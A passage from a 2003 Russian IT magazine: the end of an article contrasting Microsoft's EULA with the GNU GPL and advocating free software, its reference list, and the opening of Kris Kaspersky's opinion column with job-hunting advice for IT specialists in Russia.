Пете не удастся без нарушения лицензионного соглаше-
ния. Оно, может, и к лучшему, так как Аня поставит себе
тогда GPL/Linux. Так что в этом пункте есть плюсы.
Microsoft: «Запрет на передачу во временное пользо-
вание. Запрещается предоставлять продукт в прокат, в
аренду, во временное пользование и использовать про-
дукт для оказания третьим лицам сетевых услуг на ком-
мерческой основе».
Вы хотите вести сетевой биллинг и брать деньги? Вы
хотите поставить компьютер в интернет-кафе? Нет, вы не
можете этого сделать!

Microsoft: «Ограничение на вскрытие технологии и
декомпиляцию. Запрещается вскрывать технологию или
декомпилировать продукт за исключением случая и толь-
ко в той степени, когда такие действия явно разрешены
применимым законодательством, несмотря на наличие в
лицензионном соглашении данного ограничения».
Если вы не работаете в бывшем ФАПСИ и вас заста-
вили декомпилировать, то будучи программистом высо-
кого класса, вам обрубают крылья и сообщают, что ваши
действия по исследованию кода незаконны. Будьте доб-
ры купить кота в мешке и не дай Бог вы откроете этот
мешок и увидите, что там не кот, а дикобраз. Если вы
открыли какой-то файл и посмотрели его в hiew в режиме
asm, то вы злостный нарушитель! Не дай Бог ещё на ва-
шем компьютере найдут какой-нибудь sourcer, IDA, SoftIce
и другие программы, используемые вами, и вы не сможе-
те объяснить, что вы ими просматривали свои програм-
мы, а не лицензированный продукт. А если вы сетевой
администратор по вопросам безопасности в какой-то
фирме, то, увы, у меня к вам вопрос, а как вы получаете
зарплату, если вы даже теоретически не сможете дока-
зать безопасность чёрного ящика в виде продуктов
Microsoft?
Microsoft: «Расторжение соглашения. Без ущерба для
каких-либо иных прав корпорация Майкрософт вправе
прекратить действие настоящего лицензионного соглаше-
ния при несоблюдении вами его положений и условий. В
этом случае вы обязаны уничтожить все имеющиеся у вас
копии продукта и всех его составных частей».
Если вы мелко ошиблись и нарушили, то вас могут
заставить больше не пользоваться продуктом. Не очень
ясно, что в этом случае в теории делать – покупать новый
и с ним уже не наступать на грабли повторно?
Microsoft: «Разрешение на использование данных. Вы
соглашаетесь с тем, что корпорация Майкрософт и её аф-
филированные лица вправе собирать и использовать тех-
нические сведения, полученные любым способом в ходе
вашего обращения за услугами по технической поддерж-
ке, если таковые предоставляются, по поводу продукта».
Они заберут у вас технические сведения, однако что
под этим понимать, очень сложно сказать. По этой фор-
мулировке они могут даже серийный номер из процессо-
ра считать, и где тогда анонимность?
Microsoft: «Корпорация Майкрософт вправе исполь-
зовать эти сведения исключительно для совершенство-
вания своих продуктов или для предоставления вам спе-
циальных услуг и технологий».
Что за специальные услуги и технологии – не ясно. Или
на более быстром компьютере будет иметься возможность
удалённого более быстрого форматирования винчестера?
Microsoft: «Корпорация Майкрософт вправе предос-
тавлять эти сведения третьим лицам в форме, не раскры-
вающей вас лично».
Они дадут две не раскрывающие вас выборки, из
пересечения которых вас вычислят, и никто ничего не
нарушит.
Microsoft: «Игры и средства обновления в Интернете.
Обязательным условием использования в продукте игро-
вых возможностей и средств обновления в Интернете яв-
№9(10), сентябрь 2003
образование
ляется предоставление определенных сведений о компь-
ютере, аппаратных средствах и программном обеспече-
нии, необходимых для работы этих средств».
Хотите печатать конфиденциальные сведения и иг-
рать – заведите два компьютера!
Microsoft: «Используя эти средства, вы тем самым
явно разрешаете корпорации Майкрософт или её пол-
номочному представителю осуществлять доступ и ис-
пользование сведений, необходимых для работы игро-
вых средств и/или средств обновления в Интернете. Кор-
порация Майкрософт вправе использовать эти сведения
исключительно для совершенствования своих продуктов
или для предоставления вам специальных услуг и тех-
нологий».
Для совершенствования работы какой-то игры может
понадобиться установка какой-то функции/библиотеки/
программы, которая будет присутствовать и может зара-
ботать уже после того, как игра будет удалена.
Microsoft: «Компоненты служб в Интернете. Продукт
содержит компоненты, обеспечивающие использование
и упрощающие доступ к некоторым службам в Интерне-
те. Вы признаете и соглашаетесь с тем, что корпорация
Майкрософт имеет право выполнять автоматическую про-
верку версии продукта и/или его компонентов, которыми
вы пользуетесь, а также имеет право обновлять или ис-
правлять продукт путём автоматической загрузки соот-
ветствующего программного обеспечения на вашу рабо-
чую станцию».
В общем, вы проверили компьютер, далее начали ра-
ботать, подключились к Интернету, у вас проверили вер-
сию и залили вам без вашего ведома вредоносный софт
либо полезный софт с закладками в виде случайных оши-
бок или ещё как-то. Даже если у вас ничего нет секретно-
го, то в случае выделенного подключения к Интернету с
оплатой трафика вы будете платить деньги. Вы к этому
готовы, что вам придётся скачать на лишнюю сотню мет-
ров обновлений? Причём обновляться они могут по не-
скольку раз на дню. Как вам такая финансовая ситуация?
Трояны и хакеры отдыхают.
Microsoft: «Исправления системы безопасности».
Этот пункт для меня вообще остался серым лесом. Я
так и не понял его нужность конечному пользователю.
Microsoft: «Экспортные ограничения. Вы признаёте,
что данный продукт произведен в США и попадает под
действие установленных в США экспортных ограниче-
ний».
Это вам грозит тем, что у вас будет более слабая крип-
тография и АНБ США будет слушать вас и читать ваши
сообщения при желании. Для игр это не важно, а вот бан-
киры и сотрудники государственных учреждений должны
задуматься над этим пунктом.
Microsoft: «Отказ от предоставления гарантий. Упо-
мянутая ниже ограниченная гарантия является единствен-
ной предоставляемой вам явной гарантией, заменяющей
любые другие явные гарантии (если таковые имелись),
приведенные в какой-либо документации, на упаковке или
предоставленные иным образом. За исключением дан-
ной ограниченной гарантии и в наибольшей степени, раз-
решенной применимым законодательством, корпорация
83
 образование
Майкрософт и её поставщики предоставляют продукт и
(если таковые предоставляются) услуги по технической
поддержке на условиях «как есть», со всеми неисправно-
стями, и отказываются от предоставления каких-либо
других явных, подразумеваемых или предусмотренных за-
конодательством гарантий и условий, включая (но не ог-
раничиваясь только ими) отказ от подразумеваемой га-
рантии, обязательств или условий пригодности для про-
дажи и применимости для определенной цели, надежно-
сти или доступности, точности или полноты ответов или
результатов работы, гарантии высокого качества испол-
нения, отсутствия вирусов, отсутствия небрежности при
изготовлении продукта, а также предоставления или не-
предоставления технической поддержки или иных услуг,
сведений, программного обеспечения и содержимого в
результате или в связи с использованием продукта. Кро-
ме того, по отношению к данному продукту не обуславли-
ваются и не предоставляются гарантии права собствен-
ности, спокойного владения и пользования, соответствия
описанию или ненарушения прав на интеллектуальную
собственность».
В общем, ни за что они не отвечают, и «как есть» –
единственная форма поставки со всеми неисправностя-
ми. То есть из этой формулировки следует, что неисправ-
ности заведомо есть. То есть через некоторое время ждите
новых версий и обновлений. Что-то и за деньги. Вы про-
сто вчитайтесь и вдумайтесь. Даже документация может
описывать другие продукты или скрывать недокументи-
рованные функции.
Microsoft: «Исключение случайного, косвенного и
иных определенных видов ущерба. В наибольшей сте-
пени, допускаемой применимым законодательством, ни
при каких обстоятельствах корпорация майкрософт и её
поставщики не несут ответственности за какой-либо осо-
бый или случайный ущерб, штрафные убытки, косвен-
ный или опосредованный ущерб или убытки (включая,
но не ограничиваясь только перечисленным, упущенную
выгоду, утрату конфиденциальной или иной информа-
ции, убытки, вызванные перерывами в коммерческой или
производственной деятельности, нанесение ущерба здо-
ровью, нарушение неприкосновенности частной жизни,
неисполнение любого обязательства, включая обяза-
тельство действовать добросовестно и с разумной ос-
мотрительностью, убытки, вызванные небрежностью,
любой иной ущерб и прочие убытки имущественного или
иного характера), возникающие в связи с использова-
нием или невозможностью использования продукта, или
предоставлением или непредоставлением услуг по под-
держке или иных услуг, сведений, программного обес-
печения и содержимого в результате или в связи с ис-
пользованием продукта, или в иных случаях, предусмот-
ренных или связанных с положениями данного лицензи-
онного соглашения, даже в случае вины, гражданского
правонарушения (включая небрежность), строгой ответ-
ственности, нарушения корпорацией майкрософт или её
поставщиками договорных или гарантийных обяза-
тельств, даже если корпорация майкрософт или её по-
ставщики были заранее извещены о возможности тако-
го ущерба».
84
А здесь мы видим, что если кто-то умер по вине опе-
рационной системы, то никто отвечать за это не будет,
даже всё прописными буквами выделили, на случай если
пользователь не заметит этот важный пункт. См. [9], где
Александр Слуцкий говорит: «И сейчас подобные компь-
ютеры везде. Вон последняя 745-я серия машин «БМВ».
Это первая машина, которая не имеет ни одной физичес-
кой связи водителя с механизмом. Всё управляется че-
рез электронику. ... Управляется машина под операцион-
ной системой «Виндоус СЕ», установленной в бортовом
компьютере». У вас упал сервер – это ваши проблемы.
Надо было раньше думать, какую операционную систему
и какой фирмы использовать.
Microsoft: «Ограничение ответственности и разме-
ра возмещения ущерба. Независимо от характера и
причин причиненного вам ущерба или понесенных убыт-
ков (включая все без исключения перечисленные выше
случаи ущерба и/или убытков, а также любые прямые
или общие ущерб и/или убытки), максимальный размер
ответственности корпорации Майкрософт или любого
ее поставщика по любому из положений настоящего ли-
цензионного соглашения, и размер причитающейся вам
компенсации (за исключением компенсации в виде ре-
монта или замены продукта, предоставляемой по вы-
бору корпорацией Майкрософт в связи с нарушением
ограниченной гарантии) не может превысить большей
из следующих сумм: суммы, фактически уплаченной
вами при приобретении продукта, или суммы в разме-
ре пяти долларов США».
Конечно, они не могут отдуваться за весь мир, они,
так и быть, могут забрать продукт у вас, вернув немного
денег, или пожертвовать вам суммой в размере пяти дол-
ларов США.
Теперь давайте посмотрим на GNU GENERAL PUBLIC
LICENSE.
Вы можете делиться программой с друзьями.
GNU: «Лицензиат вправе изготовлять и распростра-
нять экземпляры исходного текста Программы в том виде,
в каком он его получил, без внесения в него изменений
на любом носителе, при соблюдении следующих условий:
на каждом экземпляре помещён знак охраны авторского
права и уведомление об отсутствии гарантий; оставлены
без изменений все уведомления, относящиеся к настоя-
щей Лицензии и отсутствию гарантий; вместе с экземп-
ляром Программы приобретателю передаётся копия на-
стоящей Лицензии».
Вы можете получать деньги за копирование и зараба-
тывать деньги на том, что будете обслуживать чужие про-
граммы.
GNU: «Лицензиат вправе взимать плату за передачу
экземпляра Программы, а также вправе за плату оказы-
вать услуги по гарантийной поддержке Программы».
Вы можете изменять продукт и продавать его в изме-
нённом виде при соблюдении условий лицензии в том
пункте, чтобы ваши ошибки не приписывали к тому про-
дукту, что был до внесения вами изменений. Это защи-
та от того, чтобы вы не ухудшали качество продукта или
если и ухудшили, то страдала бы от этого только ваша
репутация.

К любому продукту должен быть исходный код.
GNU: «Например, если вы распространяете экземпля-
ры такого программного обеспечения за плату или бес-
платно, вы обязаны передать новым обладателям все
права в том же объёме, в каком они принадлежат вам.
Вы обязаны обеспечить получение новыми обладателя-
ми программы её исходного текста или возможность его
получить. Вы также обязаны ознакомить их с условиями
настоящей Лицензии».
GNU: «Под исходным текстом произведения понима-
ется такая форма произведения, которая наиболее удоб-
на для внесения изменений».
Как вам такая формулировка против ограничения на
декомпиляцию и так не очень понятных человеку машин-
ных кодов?
GNU: «В случае если произведение в виде объект-
ного кода или в исполняемой форме распространяется
путем предоставления доступа для копирования его из
определённого места, обеспечение равноценного дос-
тупа для копирования исходного текста из этого же
места удовлетворяет требованиям распространения ис-
ходного текста, даже если третьи лица при этом не обя-
заны копировать исходный текст вместе с объектным
кодом произведения».
Если вы не программист или не хотите изменить чего-
то в программе, то вас не обязывают скачивать исходный
код и не обязывают его получать. Это как соль на столе,
когда вы можете посолить по вкусу сами, а не когда за
вас это делает повар.
GNU: «Каждой версии присваивается свой собствен-
ный номер. Если указано, что Программа распростра-
няется в соответствии с определённой версией, т.е. ука-
зан её номер, или любой более поздней версией насто-
ящей Лицензии, лицензиат вправе присоединиться к
любой из этих версий Лицензии, опубликованных Free
Software Foundation. Если Программа не содержит та-
кого указания на номер версии Лицензии лицензиат
вправе присоединиться к любой из версий Лицензии,
опубликованных когда-либо Free Software Foundation
(http://www.fsf.org)».
С версиями и модификациями тоже внесена ясность.
GNU: «Отсутствие гарантийных обязательств. По-
скольку настоящая программа распространяется бесплат-
но, гарантии на неё не предоставляются в той степени, в
какой это допускается применимым правом. Настоящая
программа поставляется на условиях «как есть». Если
иное не указано в письменной форме, автор и/или иной
правообладатель не принимает на себя никаких гаран-
тийных обязательств, как явно выраженных, так и подра-
зумеваемых, в отношении программы, в том числе под-
разумеваемую гарантию товарного состояния при прода-
же и пригодности для использования в конкретных целях,
а также любые иные гарантии. Все риски, связанные с
качеством и производительностью программы, несет ли-
цензиат. В случае если в программе будут обнаружены
недостатки, все расходы, связанные с техническим об-
служиванием, ремонтом или исправлением программы,
несет лицензиат».
Тут мы тоже видим, что продукт поставляется «как
№9(10), сентябрь 2003
образование
есть», однако это не мешает вам написать автору про-
дукта и попросить у него помощи. Также это не мешает
создавать форумы, где можно обсуждать те или иные про-
блемы продуктов, и также вы можете пользоваться услу-
гами третьих лиц, которые безвозмездно или за плату
предложили вам помочь.
В конце можно заключить, что наиболее выгодной яв-
ляется лицензия GNU GENERAL PUBLIC LICENSE, так как
она предоставляет больше прав программистам, не ог-
раничивает их в своих правах. Она также не ограничива-
ет людей, далёких от программирования и не лишает их
возможности получения помощи. Также никому не запре-
щается осуществлять помощь и гарантийное обслужива-
ние чужих продуктов. Подобно тому, как вы можете чи-
нить свой автомобиль в любом понравившемся вам сер-
висе или помогать в починке другим. Вы можете раскру-
тить свой автомобиль по гаечкам и заглянуть к нему под
капот, и это даёт обязательная возможность получения
вами исходных текстов бесплатно или за разумную пла-
ту, необходимую для доставки.
Вы можете вносить изменения в продукты и никто не
будет с вас спрашивать, на каком компьютере вы его за-
пускаете. Вас не будут просить передавать какие-либо
сведения кому-либо. Вас не могут явно заставить прекра-
тить использовать какой-то продукт, если вы что-то нару-
шили. Вас никто не заставит покупать много копий или
много лицензий. Вы можете установить приобретённый
вами или бесплатно переписанный экземпляр какой-то
программы или операционной системы где угодно и сколь-
ко угодно раз. Вас никто не будет ограничивать в количе-
стве подключений к вашему серверу. Вы можете делать
всё что угодно с программными продуктами. Программ-
ные продукты предоставляются вам в удобной для изме-
нения форме. Всё сделано людьми для людей.
Массовый переход на использование продуктов с от-
крытым кодом значительно упростил бы жизнь. И увере-
ния Miscrosoft, что некому будет адаптировать программ-
ные продукты для конкретных нужд какой-нибудь органи-
зации, сильно схожи с завышенным самомнением.
Очень смущает на фоне всего этого заключение со-
глашения между бывшим ФАПСИ и Microsoft, которые ре-
шили предоставить на просмотр исходный код через спе-
цифический редактор, якобы улучшающий возможности
просматривающего. [8] (А может, и скрывающий куски
кода?) Да и зачем ехать в штабквартиру для просмотра
особых кусков кода? Не проще ли остановить свой выбор
на продуктах под GPL, где исходный код уже сразу от-
крыт и нет смысла носить воду в решете.
Привычка людей – это большой подводный камень и,
пожалуй, единственная вещь, которая заставляет людей
делать неправильный выбор. Наиболее уместна в завер-
шение будет пословица «Кто платит, тот и заказывает
музыку», и здравого смысла в этом нет и не может быть,
пока нас с вами окружают материалисты, целью которых
стоит личностное обогащение за счёт других. «Возьми от
жизни всё!», так и просится дописать: «Не можешь взять
умом – отбери у соседа силой». Разве что сосед тоже не
дремлет и отнимет первым.
85
образование
Литература:
1. Николо Макиавелли. Государь. – М.:ЭКСМО-Пресс;
Харьков: Фолио, 1998.
2. Марк Митчел, Джеффри Оулдем, Алекс Самьюэл. Про-
граммирование для Linux. Профессиональный подход.:
Пер.с англ. – М.: Издательский дом «Вильямс», 2002.
3. GNU’s Not Unix! – the GNU Project and the Free Software
Foundation (FSF): http://www.gnu.org/. Текст лицензии:
http://www.gnu.org/copyleft/gpl.html
4. Неофициальный перевод Елены Тяпкиной на русский
язык GENERAL PUBLIC LICENSE GNU: http://
linux.yaroslavl.ru/docs/about/license/gplrus.html
5. Перевод Сергея Середы на русский язык GENERAL
PUBLIC LICENSE GNU: http://consumer.nm.ru/gpl_ru.htm
6. Примеры лицензионных соглашений Microsoft с конеч-
ным пользователем (EULA): http://www.microsoft.com/
rus/licensing/general/examples/
7. Лицензионное соглашение Microsoft Windows XP Home
Edition: http://www.microsoft.com/rus/licensing/general/
examples/winxphome_box.asp
8. State Applauds Open Windows by Larisa Naumenko//The
Moscow Times No.2602 Wendesday, January 22, 2003,
p.9.
9. Дмитрий Аксёнов. Киберкоп, или Конец виртуального
мира//Системный администратор №1(2) январь 2003 г. –
С. 57.
86
10. «This Chip Will Explode in 5 Seconds»: Imagining the Uses
THE NEW YORK TIMES February 14, 2002 By IAN
AUSTEN, http://physicalsciences.ucsd.edu/news_articles/
missionimpossible.htm
11. «Телефон-граната» //Ломоносов вместе с NewScientist,
№3, сентябрь 2002 г. – С.17.
12. The Open Source Definition http://www.opensource.org/
docs/definition_plain.html
13. Соглашение OpenSource//Джек Такет(мл.), Стив Бар-
нет Использование Linux. Специальное издание.:5-е
изд.:Пер. с англ.: Уч.пос. - М.: Издательский дом «Ви-
льямс», 2000 г. – С.765-767.
14. Руководящий документ Гостехкомиссии при президен-
те РФ «Средства вычислительной техники. Межсете-
вые экраны. Защита от несанкционированного досту-
па к информации. Показатели защищенности от не-
санкционированного доступа к информации». http://
aker.alpha.ru/Certif/RD_FW.html
15. Руководящий документ Гостехкомиссии при президен-
те РФ «Автоматизированные системы. Защита от не-
санкционированного доступа к информации. Класси-
фикация автоматизированных систем и требования по
защите информации». http://www.security.lanit.ru/lib/
rd1.html
16. Department Of Defense Trusted Computer System Evaluation
Criteria(«Orange book»), December, 1985. http://
www.radium.ncsc.mil/tpep/library/rainbow/5200.28-STD.html
IMHO

РЕЦЕПТЫ ПРАВИЛЬНОГО
ТРУДОУСТРОЙСТВА «Не нужно плыть по течению. Не нужно плыть против
течения. Нужно плыть ттууда, куда тебе надо»
куда
Козьма Пру
Козьма тк
Прутков
тков

Относительно рынка труда в России

существует два мнения: пациент скорее жив,
чем мертв, и пациент скорее мертв, чем жив.
Лично я считаю, что в сфере информационных
технологий реализовать свой потенциал
в России намного проще, чем во всех
остальных странах мира вместе взятых.
Недостаток квалифицированной рабочей
силы у нас просто колоссальный,
и трудоустроиться в этой обстановке очень
легко. Правда, в отличие от западных стран
цивилизованного рынка труда в России
как не было, так и нет, и потому механизмы
трудоустройства, которые хорошо работают
«там», у нас вращаются со скрипом или
не вращаются вообще. И, если вам до чертиков
надоело заполнять эти шаблонные резюме
и вы хотите попробовать другие, более
действенные методы, эта статья для вас!

КРИС КАСПЕРСКИ
88

Ваши действия
по трудоустройству по шагам
Большинство статей, посвященных трудоустройству, на-
чинаются с рекомендаций по правильному заполнению
резюме и хитростям их размещения на сайтах типа
www.all-jobs.ru. Так вот: все это чушь собачья и слепое
следование американскому шаблонному образцу. Так вы
ничего не найдете, а если и найдете, то лишь благодаря
его величеству Счастливому Случаю. Резюме – это пас-
сивный способ трудоустройства, и от вас тут действи-
тельно очень мало что зависит. Вот активный способ –
это другое дело!
Прежде всего уясните себе одну очень простую
вещь. Гарантированное трудоустройство обеспечива-
ется либо за счет связей, либо за счет ваших профес-
сиональных навыков. Ситуацию со связями мы рассмат-
ривать не будем, т.к. тут и без нас все предельно ясно,
а вот на профессиональных навыках остановимся по-
подробнее.
Ингредиент номер один: опыт
Большинство молодых людей, устраивающихся на рабо-
ту, имеют крайне оптимистичное представление об уров-
не своей подготовки и перечисляют длинный список опе-
рационных систем и программных пакетов, с которыми
они как бы умеют работать. И чем длиннее такой список,
тем меньше шансов у его обладателя на скорое трудоус-
тройство. Людей, совмещающих блестящие знания баз
данных с умением проектировать интерфейсы и отлажи-
вать драйвера, единицы, и работодатели об этом прекрас-
но знают. Подавляющее большинство специалистов уме-
ют делать что-то одно, но зато они делают это хорошо.
«Специалисты» же, претендующие на обширные и глубо-
кие знания в различных областях, в подавляющем боль-
шинстве случаев не представляют для нанимателей аб-
солютно никакого интереса. Скажите, а вы бы купили те-
левизор, совмещенный с холодильником и шагающим эк-
скаватором?
Выберите какое-то одно конкретное направление,
близкое вам по духу и по теме. Скажем, системный про-
граммист может быть по своей натуре человеком нелю-
димым и необщительным, поскольку природа системных
компонентов такова, что они могут создаваться и в оди-
ночку. Прикладной программист уметь работать в коллек-
тиве обязан по определению, а системный администра-
тор – это, в первую очередь, не столько хороший специа-
лист, сколько первоклассный хозяйственник.
Теперь вы должны приложить максимум усилий к
тому, чтобы освоить свою специальность до полного не-
понимания. Да-да, именно непонимания, ибо в позна-
нии есть как минимум три стадии: знаю мало-помалу,
знаю все и ничего не знаю. Достижение третьей ста-
дии и есть свидетельство того, что вы кое в чем начи-
наете разбираться. Важно понять: профессиональные
навыки не могут быть приобретены ни дома, ни в уни-
верситете. Лишь на реальной работе, в окружении ре-
альных специалистов и в процессе решения реальных
проблем постигаются азы любых высокотехнологичес-
ких профессий.
№9(10), сентябрь 2003
iMHO
Итак, задача-минимум: найти фирму, где волею судь-
бы в данный конкретный момент собрались очень не-
глупые люди, и устроиться туда на любую диктуемую ра-
ботодателем зарплату, а то и вовсе бесплатно (это не
шутка! Лучше бесплатно получать образование на фир-
ме, чем платить деньги за протирание штанов в универ-
ситете! Сам автор когда-то так и поступал). Только по-
мните, что профессию не получают, а воруют! Здесь пе-
дагогов нет и лекции читать никто не будет. Держите все
шесть органов своих чувств широко открытыми и все-
сторонне анализируйте каждую ситуацию, почему у ва-
ших старших товарищей что-то получается, а у вас нет.
Причем не пытайтесь вести записи вида «если из про-
цессора 248AE идет дым, необходимо подтянуть терми-
натор 63-98 к верхнему сигнальному уровню». Подоб-
ная информация очень быстро устаревает, и к тому же
суть профессионализма заключается отнюдь не в сум-
ме знаний, а в умении при неполноте этих самых знаний
быстро найти наиболее перспективное направление, в
котором надо «копать».
Практика показывает, что любой наугад взятый кол-
лектив умных людей не может существовать бесконеч-
но долго и очень быстро распадается (почему – не знаю,
но наблюдаемый факт), так что очень может статься,
что ни одного такого коллектива в пределах вашей до-
сягаемости просто не окажется. И что тогда? Тогда –
отправляйтесь в ближайший торговый салон и заклю-
чайте с ними долгосрочный договор на взятие той или
иной аппаратуры напрокат (естественно, за деньги и с
предоплатой). Большинство продавцов на это идет с
радостью, а вы получаете в свое распоряжение боль-
шое количество разношерстного железа. Зачем это
нужно? А затем, что без опыта работы с оборудовани-
ем вы никогда не станете настоящим специалистом.
Чем больше оборудования пройдет через ваши руки, -
тем больше у вас накопится опыта по устранению со-
путствующих ему проблем и в конце концов разовьет-
ся настоящий нюх на неисправности. То же самое ка-
сается и программистов (как прикладных, так и систем-
ных). Компьютерное железо очень различно, и всякая
конфигурация имеет свои особенности. Программа,
заточенная под одно оборудование, на другом может
просто не пойти, и все это вы должны заранее знать!
Если же денег на приобретение оборудования у вас
нет, устраивайтесь в торговую фирму хотя бы простым
сторожем, но с правом доступа к железу.
Из литературы вам потребуется… да, пожалуй, не
потребуется ровным счетом ничего, кроме учебника ан-
глийского языка и миллионов страниц документации,
которую можно свободно скачать из Интернета и рас-
печатать. Учебники в стиле «Язык Си++ для начинаю-
щих» приносят намного больше вреда, чем пользы и
зачастую необратимо калечат мышление новичков.
Приучайтесь осваивать продукт по его родной докумен-
тации, а не по ее исковерканным описаниям сторонни-
ми авторами. Да, знаю, это трудно и на первых порах
языковой барьер будет очень мешать (ведь вся доку-
ментация сплошь на английском), но другого пути у вас
просто нет. Профессионал не может позволить себе
89
 IMHO
впасть в зависимость от наличия корректных русских
переводов. Но не пытайтесь уподобить документацию
догмату – ее ведь люди пишут, и ошибок там… Ничего
не принимайте на веру и все, абсолютно все проверяй-
те экспериментально. Разумеется, это не означает, что
все, не являющееся документацией, недостойно ваше-
го внимания. Напротив! Читайте все, что только под-
вернется вам под руку (особенно ту литературу, что
описывает личный опыт ее автора), активно участвуй-
те в сетевых конференциях (опять-таки ничего не при-
нимая на веру без предварительной проверки), будьте
жадными до информации, как бурундук до желудей.
Информация – штука такая, никогда нельзя сказать на-
перед: понадобится вам она или нет.
Ингредиент номер два: авторитет
Хорошо, необходимый опыт у вас уже имеется. Теперь
остается добиться того, чтобы об этом узнали все окру-
жающие. То есть, говоря другими словами, вам нужно
приобрести авторитет. Самое главное – не начать дей-
ствовать раньше времени. Первый блин, который, как
известно, всегда идет комом, может сослужить плохую
службу, и у окружающих сложится значительно худшее
мнение о вас, чем оно сложилось бы, начни вы заявлять о
себе чуточку позже.
Заявлять о себе можно различными путями. Если вы
программист – напишите несколько хороших программ,
вложив в них весь свой опыт и душу, и выложите их в
открытый доступ в Интернет вместе с исходными текста-
ми в придачу, так как даже беглый взгляд на последние
позволяет надежно установить приблизительный уровень
вашего профессионализма. Будет просто замечательно,
если эти программы дойдут по вашего потенциального
работодателя своим естественным путем и он окажется
от них в полном восторге. Считайте, что после этого вы-
сокооплачиваемое рабочее место у вас уже в кармане.
Системному администратору наглядно продемонстри-
ровать свои таланты намного труднее, однако если эти
таланты действительно есть, попробуйте написать не-
сколько статей в различные компьютерные журналы, рас-
крывающие секреты вашего профессионального мастер-
ства. С высокой степенью вероятности вас заметят и пред-
ложат работу, если, конечно, вы не сделаете приписки к
статье с пометкой «готов рассмотреть предложения о ра-
боте». Наниматели склонны считать, что настоящие про-
фессионалы без работы не сидят и, похоже, что они очень
даже правы.
В сетевых конференциях не кидайтесь в атаку, стре-
мясь продемонстрировать свои знания за счет уличения
ваших собеседников в невежестве. Во-первых, еще не-
известно, чья возьмет (с точки зрения внешнего наблю-
дателя, не разбирающегося в технических деталях спо-
ра, ошибочные аргументы вашего оппонента зачастую
выглядят более убедительными, нежели бесспорные ис-
тины, высказанные вами). Во-вторых, настоящие про-
фессионалы в таких склоках практически никогда не
участвуют: нет времени, да и необходимости переубеж-
дать заблудших тоже нет. Позвольте одну маленькую
китайскую притчу:
90
Цзи Синцзы тренировал бойцового петуха для чжоус-
кого царя Сюаньвана. Через десять дней [царь] спросил:
– Готов ли петух к бою?
– Еще нет. Пока самонадеян, попусту кичится.
Через десять дней [царь] снова задал [тот же] вопрос.
– Пока нет. Еще бросается на [каждую] тень, отклика-
ется на [каждый] звук.
Через десять дней [царь] снова задал [тот же] вопрос.
– Пока нет. Взгляд еще полон ненависти, сила бьет че-
рез край.
Через десять дней [царь] снова задал [тот же] вопрос.
– Почти [готов]. Не встревожится, пусть даже услышит
[другого] петуха. Взгляни на него – будто вырезан из дере-
ва. Полнота его свойств совершенна. На его вызов не по-
смеет откликнуться ни один петух – повернется и сбежит.
Существует такое мнение: что сначала человек ра-
ботает на авторитет, а затем авторитет работает на че-
ловека. Отчасти это действительно так, однако отсюда
вовсе не следует, что однажды заработав хороший ав-
торитет, можно до конца жизни уже ничего не делать.
В сфере информационных технологий все очень быст-
ро меняется и старые заслуги здесь быстро списывают
в утиль.
Ингредиент номер три:
чувство собственного достоинства
Как говорит народная мудрость, любой начальник имеет
над тобой ровно столько власти, столько ты ему даешь
властвовать над собой. В идеале начальник – это ваш то-
варищ и полноправный партнер, и его власть чисто ус-
ловна. Он имеет право уволить вас или понизить вам зар-
плату, а вы имеете право сказать вслух все, что вы о нем
думаете, и отправиться восвояси к другому месту рабо-
ты. Соответственно начальник не имеет права держать
вас на работе против вашей собственной воли, а вы не
имеете права работать на ней, если были уволены. Так
что ваши шансы абсолютно равны. Вы как два гребца,
сидящих в одной лодке. Если не будет вас (не в смысле
вас лично, а всего рабочего персонала), то начальник сам
по себе далеко не уплывет.
Почему начальники бывают злые? Да потому, что
мы готовы работать и у злых начальников. Если вас это
лично не устраивает – не позволяйте ему срывать свою
злость на вас. Держитесь независимо и с достоинством.
За дело фирмы – болейте. На амбиции начальника –
начихать. Умный начальник это сразу поймет и осла-
бит давление. Глупый… глупый, конечно, немедленно
уволит, ну да не велика потеря. В конечном счете если
вы не будете себя уважать, то начальник уважать вас
уж точно не станет.
Однако ни в коем случае не пытайтесь чем-либо уг-
рожать или шантажировать начальника и, уж тем бо-
лее категорически недопустимо внедрять деструктив-
ные компоненты в систему или так или иначе вреди-
тельствовать!
Забавное наблюдение из жизни автора: тех начальни-
ков, что он считал хорошими начальниками, большинство
окружающих зачастую считало крайне агрессивными и

деспотичными, и, соответственно, наоборот. Отсюда мо-
раль: личность начальника – это чистейшей воды абст-
ракция. Результат взаимоотношений между двумя людь-
ми в равной степени зависит от них обоих.
Стратегия действий
в ситуации «выбираете вы»
В выборе работы и знакомстве с девушкой есть много
общего. Основной неудачей неопытных любовников яв-
ляется то, что, получив категоричный отказ, они автома-
тически переключаются на другого партнера, и так про-
исходит до тех пор, пока им не «повезет». Только везение
это довольно относительное (отсюда и кавычки). Дама
сердца, ответившая первому встречному «да», навряд ли
окажется хорошей спутницей жизни, и уж точно не самой
лучшей, какую мог наш кавалер завоевать, будь он не-
много понастойчивее.
Куда бы вы ни стремились устроится: хоть в Микро-
софт, хоть в Вася Пупкин и К, вы устроитесь туда, если
будете действовать по плану! Впрочем, Микрософт, по-
любому это не лучший выбор (см. врезку «Корпорации
и крупные компании»), а Васи Пупкины – они очень раз-
ные бывают. Поэтому, выбирая будущее место своей
работы, прежде всего к нему присмотритесь. Сделав
ставку на молодую фирму, вы можете сорвать большой
куш, т.к. такие фирмы обычно испытывают большие про-
блемы с персоналом и потому могут сразу же предло-
жить чрезвычайно соблазнительные условия, однако
если фирма через год-два рухнет, вы останетесь прак-
тически ни с чем и весь процесс придется начинать сна-
чала (впрочем, приобретенный опыт с вами все-таки
останется). Фирмы, существующие на рынке несколько
лет (а то и десятилетий) также не гарант стабильности,
и прежде чем туда соваться, вы должны в меру своих
сил и возможностей изучить перспективы долгосрочно-
го развития фирмы. Посмотрите: не расширялась ли
фирма до размеров амбиций своего директора в тот
период, когда ей следовало бы бросить все силы на вы-
живание? Соответствует ли зарплата сотрудников дохо-
ду? Многие фирмы в плане привлечения специалистов
увеличивают им зарплату до той степени, что работа
специалистов перестает быть доходной и тогда зарпла-
та вновь возвращается в нормальное русло (в результа-
те чего все специалисты просто разбегаются), либо же
фирма просто разлетается по швам.
Несколько советов,
как вести себя на собеседовании
Первое и главное. Не бойся показаться дураком, бойся
показаться умным. Умный человек часто становится уг-
розой для его непосредственного начальника, и от таких
заблаговременно пытаются избавляться.
Второе. Не интересуйся зарплатой. Не интересуйся
условиями труда. Интересуйся работой. Это вызывает
уважение работодателя и значительно увеличивает твои
шансы на успех. А зарплата… не понравится – уйдешь.
